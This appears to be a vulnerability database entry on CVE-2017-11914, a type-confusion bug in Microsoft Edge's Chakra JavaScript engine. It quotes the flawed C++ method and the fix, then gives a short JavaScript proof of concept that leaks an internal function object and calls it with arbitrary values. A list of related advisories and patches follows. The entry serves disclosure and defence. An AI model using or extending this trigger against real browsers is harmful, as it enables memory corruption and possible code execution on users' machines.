Lucene search
RootSSV:97094HistoryJan 22, 2018 - 12:00 a.m.
Microsoft Edge: Chakra: JavascriptGeneratorFunction::GetPropertyBuiltIns exposes scriptFunction(CVE-2017-11914)
2018-01-2200:00:00
Root
www.seebug.org
14
0.949 High
EPSS
Percentile
99.1%
Hereâs a snippet of the method.
bool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result)
{
if (propertyId == PropertyIds::length)
{
...
int len = 0;
Var varLength;
if (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext))
{
len = JavascriptConversion::ToInt32(varLength, requestContext);
}
...
return true;
}
return false;
}
âJavascriptGeneratorFunctionâ is like a wrapper class used to ensure the arguments for âscriptFunctionâ. So âscriptFunctionâ must not be exposed to user JavaScript code. But the vulnerable method exposes âscriptFunctionâ as âthisâ when getting the âlengthâ property.
The code should be like: âscriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);â
Type confusion PoC:
function* f() {
}
let g;
f.__defineGetter__('length', function () {
g = this; // g == "scriptFunction"
});
f.length;
g.call(0x1234, 0x5678); // type confusion
Related
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11914)
2017-12-12 00:00:00
packetstorm
packetstorm
zdt
zdt
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2017-12-12 08:00:00
symantec
symantec
veracode
veracode
Privilege Escalation
2018-07-05 05:13:18
Remote Code Execution (RCE)
2018-07-05 02:45:16
Remote Code Execution (RCE)
2018-07-05 03:39:12
osv
osv
prion
prion
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
Memory corruption
2017-12-12 21:29:00
cve
cve
github
github
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:51
ChakraCore RCE Vulnerability
2022-05-17 00:11:58
ChakraCore vulnerable to remote code execution
2022-05-14 01:06:50
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4053580)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053578)
2017-12-13 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4053579)
2017-12-13 00:00:00
nessus
nessus
KB4053578: Windows 10 Version 1511 December 2017 Security Update
2017-12-12 00:00:00
KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
2017-12-12 00:00:00
KB4053580: Windows 10 Version 1703 December 2017 Security Update
2017-12-12 00:00:00
mskb
mskb
December 12, 2017âKB4054517 (OS Build 16299.125)
2017-12-12 08:00:00
December 12, 2017âKB4053579 (OS Build 14393.1944)
2017-12-12 08:00:00
December 12, 2017âKB4053580 (OS Build 15063.786)
2017-12-12 08:00:00
kaspersky
kaspersky
KLA11158 Multiple vunlerabilities in Microsoft Browsers
2017-12-12 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - December 2017
2017-12-12 15:32:00
trendmicroblog
trendmicroblog